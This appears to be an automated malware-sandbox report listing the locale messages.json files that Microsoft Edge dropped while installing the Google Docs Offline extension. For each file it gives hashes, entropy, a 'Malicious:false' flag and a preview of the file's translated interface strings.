                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):968
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):838
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1305
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):911
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):939
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                        Malicious:false
